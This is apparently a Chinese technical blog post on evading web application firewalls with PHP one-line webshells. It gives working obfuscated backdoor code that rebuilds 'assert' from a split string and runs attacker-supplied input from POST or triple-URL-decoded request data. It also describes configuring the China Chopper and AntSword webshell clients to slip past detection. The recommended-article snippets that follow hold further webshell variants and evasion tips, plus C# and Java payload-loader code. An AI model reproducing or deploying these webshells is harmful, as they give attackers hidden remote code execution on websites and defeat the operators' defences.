论一句话过WAF

原创 已于 2022-09-19 14:17:42 修改 · 2k 阅读 · 1 ·
CC 4.0 BY-SA版权
仅供学习,未经许可不得擅自转载
文章标签:

#php #开发语言

于 2019-03-07 00:39:45 首次发布

一.绕过方式

  • 木马存在敏感字符被拦截

木马代码存在敏感字符,直接被waf。如:如直接传<?php @@eval($_POST['123']); ?>,由于存在eval危险函数直接被拦截。

这时候需要对被waf的危险字符进行各种变形即可

收集的过狗马,最大同性交友网站github也有很多webshell项目

$poc = "a#s#s#e#r#t";

$poc_1 = explode("#", $poc);

$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];

$poc_2($_POST['super'])

  • Request请求体中存在敏感字符被拦截

最常见的就是对User-Agent和请求参数中进行检测。

如请求参数中存在敏感字符就会被拦,也会对特定标识的User-Agent头部进行拦截。如中国菜刀的User-Agent头部标识。

如对GET请求数据中的phpinfo()字符进行拦截

这时候我们需要对请求的参数进行编码,相对的在一句话代码中需要对传入的参数进行解密

如: 使用3次URL编码绕过

<?php

$poc ="axsxsxexrxt";

$poc_1 = explode("x", $poc);

$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];

$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));

?>

Phpinfo()进行三次url编码

二.原版菜刀的过waf配置

在Config.ini文件中对PHP_MAKE参数进行加密

如:   需要对传参进行三次URL编码

PHP_MAKE参数进行三次url加密和设置请求头即可

三.中国蚁剑AndSword过waf的配置

配置编码设置,这里我已PHP脚本作为例子

这里会有一个base64编码作为示范,只需要改动data[pwd]即可

三次URL编码,注意${randomID}不要做处理

在下方选中解密器,配置User-Agent

supdon
关注
mysql5.7性能提升一百倍调优宝典
打造全国最全的AI Agent开发知识领域的博客
05-06 1万+
全文中一共有常用的(事实上你如果花1-2周阅读、理解、自己动手设一下后是需要这么多参数的)76个参数,我是按照: 每一个参数干吗? 在某些典型硬件配置下的db上参数该设多少? 设会怎么样? 不设会怎么样? 有什么坑如何填坑? 有些参数怎么算、算法又如何 这种style来写的,具体请看文档! 一千个DBA就有一千种配置方式! 大家一定记得不要轻易去看网上,要看只看官网!网上很多博客都...
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
一句话木马WAF绕过
CheAyuki13的博客
10-03 580
原理WAF通常会以关键字判断是否为一句话木马,所以要将一句话木马变形使用,从而绕过 waf:1.php变量函数<?php $a = "assert"; $a($_POST['-7']); ?>2.str_replace函数<?php $a = str_replace("b", "", "absbsbebrbt")...
PHP WebShell免杀技术深度解析:从零学习到实战绕过
最新发布
gitblog_00830的博客
06-28 493
PHP WebShell免杀技术深度解析:从零学习到实战绕过 前言 在网络安全攻防对抗中,WebShell作为攻击者维持权限的重要工具,其免杀技术一直是安全研究人员关注的焦点。本文将基于PHP WebShell免杀技术,从基础语法到高级绕过技巧,全面剖析各类免杀方法,帮助安全从业者深入理解WebShell免杀原理。 一、PHP基础语法精要 1.1 PHP基本结构与特性 PHP脚本的基本结构如下: ...
php一句话木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句话木马? 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
蚁剑特征性信息修改简单过WAF
Adminxe的博客
09-21 1108
0x00 前言 针对于蚁剑的特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行 这几部分的修改。 0x01 修改位置 蚁剑代理通道 UA特征伪造 RSA流量加密 0x02 具体操作 1.蚁剑代理通道 蚁剑代理通道设置(前提是必须有这个代理): 2.UA特征伪造 蚁剑默认UA抓包: 主要修改的位置: /modules/request.js 这边主要是推荐百度UA,具体自己可以百度下其他UA,都可..
WAF绕过(上)
A526847的博客
05-19 801
或者$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");自增运算:因为在PHP中,'a'++ => 'b','b'++ => 'c',所以我们如果得到了其中的一个字母,通过这个字符就可以得到 所有的字母。
记一次SQL注入绕过宝塔+云waf
qq_51542789的博客
12-20 1431
SQL注入如何绕过宝塔waf心得
2020西湖论剑Web复现
风过江南乱的博客
11-01 771
前言 总共5题,最简单的easyjson都没出。。。 题目 1、easyjson 题目源码 <?php include 'security.php'; if(!isset($_GET['source'])){ show_source(__FILE__); die(); } //生成沙箱文件夹 $sandbox = 'sandbox/'.sha1($_SERVER['HTTP_X_FORWARDED_FOR']).'/'; var_dump($sandbox); if(!fi
密码安全攻防技术精讲
GitChat
07-03 3409
课程介绍 本课程内容将以作者亲身经历的事情为主,从技术的视野和攻防角度来剖析各种密码及其他技术对工作和个人生活的影响,将“高高在上”的技术拉进我们日常的生活中来。每一篇文章都是精挑细选的典型案例,背后都有真实故事和场景,以技术的方式来再现和还原。 非技术专业读者可以通过这些文章来了解和预防各种涉及密码的攻击,从事技术工作的读者可以按照文章的搭建环境进行实战实践。由于篇幅有限,密码攻防涉及的技术非常...
我看过的安全方面的好文章
个人博客
05-18 1023
本文不定期更新,最后更新于2019-5-18 GitHub上实时更新,地址:good-articles-by-sort/安全.md 安全 XSS的各种用途(窃取用户cookie、界面劫持…) 实战Teensy烧录渗透测试U盘 被长期忽视、却危害巨大的邮件追踪术 老歌新唱|PUNYCODE再利用 浅说 XSS 和 CSRF 我是如何拿下一个中学的官方网站的? - 知乎专栏 黑客之死 ROUTER...
一句话木马 php 过狗,如何自己写aspx过狗D盾一句话木马
weixin_39524882的博客
03-18 381
hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx引用i春秋作家团大佬一句话木马的意思就是,我们制造了一个包含远程代码执行漏洞的web页面。目录:0×01:我没有aspx代码编写基础,我该从哪入手?0×02:正式开始:从过狗菜刀配置文件里寻找思路0×03:再写一个:分析各种拦截机制,一一绕...
绕过WAF-一句话木马
qq_30787769的博客
12-10 2795
注:本次的测试环境是最新的安全狗Apache:V4.0 一句话木马:<?php eval($_REQUEST['a'])?> 1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func() 2.使用end()函数来代替,可以写成: <?php eval(end($_REQUE...
php一句话waf春秋,【过waf篇】一句话木马如何优雅地过waf
weixin_32924669的博客
03-21 295
【过waf篇】一句话木马如何优雅地过waf0x00WAF简介作者:雨幕 微信公众号:异空间安全Web应用防护系统(也称:网站应用级入侵防御系统。英文:WebApplicationFirewall,简称:WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。Waf拦截一句话木马原理:以正则表达式匹配关键字判断是...
绕过D盾的一句话
03-05 5808
一个很简单的一个技巧,作个笔记,可以绕过D盾检测。 新建test1.php &lt;?php eval($_POST[g]); ?&gt; 新建test2.php &lt;?php $a="$_POST[g]"; eval($a=$a); ?&gt; 使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。 那么问题就出现...
记一次绕过宝塔防火墙的BC站渗透
小司机的奥拓
05-27 1561
由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息这是一个查询代理帐号的站 url输入admin 自动跳转至后台看这个参数 猜测可能是thinkCMFthinkcmf正好有一个RCE 可以尝试一下白屏是个好兆头 应该是成功了访问一下尝试蚁剑连接 直接报错 猜测可能遇到防火墙了然后再回来看一下shell 手动尝试一个phpinfo果然存在宝塔防火墙。
php绕过宝塔,一句命令绕过宝塔面板强制绑定账号
weixin_34505281的博客
03-27 2148
现在新版本的宝塔面板强制绑定宝塔官网账号,否则就无法继续使用面板。网上绕过强制绑定账号的方法也很多,但是都显得比较麻烦,不符合宝塔面板针对小白用户的定位。因此我总结了只需要在SSH输入一句命令即可。复制以下命令在SSH界面执行:sed -i "s|bind_user == ‘True’|bind_user == ‘XXXX’|" /www/server/panel/BTPanel/static/j...
一句话木马绕过WAF
02-12
### 绕过WAF一句话木马技术 为了有效绕过WAF并实施一句话木马攻击,通常采用多种混淆技术和非常规编码方式。通过这些手段可以避开基于签名检测的传统防御措施。 #### 动态二进制加密实现新型一句话木马 一种有效的策略是利用动态二进制加密来创建难以被识别的一句话木马[^4]。这种方法涉及在运行时才解密实际执行的有效载荷(payload),从而使得静态分析变得困难。具体来说,在.NET环境中可以通过反射加载经过AES或其他强加密算法处理过的恶意代码片段,并仅当接收到特定请求参数触发时才会对其进行即时解码和执行。 ```csharp using System; using System.IO; using System.Reflection; public class DynamicBinaryShell { private static byte[] encryptedPayload = Convert.FromBase64String("..."); public static void Main() { var assemblyBytes = Decrypt(encryptedPayload); Assembly.Load(assemblyBytes).EntryPoint.Invoke(null, null); } private static byte[] Decrypt(byte[] data) { // 实现具体的解密逻辑... return decryptedData; } } ``` 此段C#代码展示了如何将一段已加密的字节数组转换回可执行形式并通过`Assembly.Load()`方法将其注入到当前进程中去执行。由于原始恶意代码是以不可读的形式存在直到真正被执行那一刻之前都不会暴露出来,所以大大增加了绕过大多数常规安全设备的可能性。 #### Java环境下的Class文件动态解析 对于Java平台而言,则可通过自定义类加载器的方式达到相似效果——即先上传看似无害但实际上包含了隐藏功能的`.class`文件至目标主机上;之后再借助HTTP请求携带特殊指令激活它内部预设的行为模式完成进一步操作[^5]: ```java import java.net.*; import java.io.*; public final class ClassLoaderShell extends URLClassLoader { @Override protected synchronized Class<?> findClass(String name) throws ClassNotFoundException { try (InputStream is = new FileInputStream("/tmp/malicious.class")) { ByteArrayOutputStream buffer = new ByteArrayOutputStream(); int nRead; byte[] data = new byte[1024]; while ((nRead = is.read(data, 0, data.length)) != -1){ buffer.write(data, 0, nRead); } byte[] classData = buffer.toByteArray(); return defineClass(name, classData , 0, classData .length); } catch(IOException e){ throw new RuntimeException(e.getMessage()); } } public static void main(final String... args)throws Exception{ ClassLoader cl = new ClassLoaderShell(new URL[]{}); cl.loadClass("Malicious").newInstance().equals(args); } } ``` 上述例子说明了一个简单的自定义类加载过程,其中`findClass`重写了默认行为以允许从指定路径加载外部提供的未认证classes资源。一旦成功实例化此类对象便能按照设计意图行事而不易引起注意。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值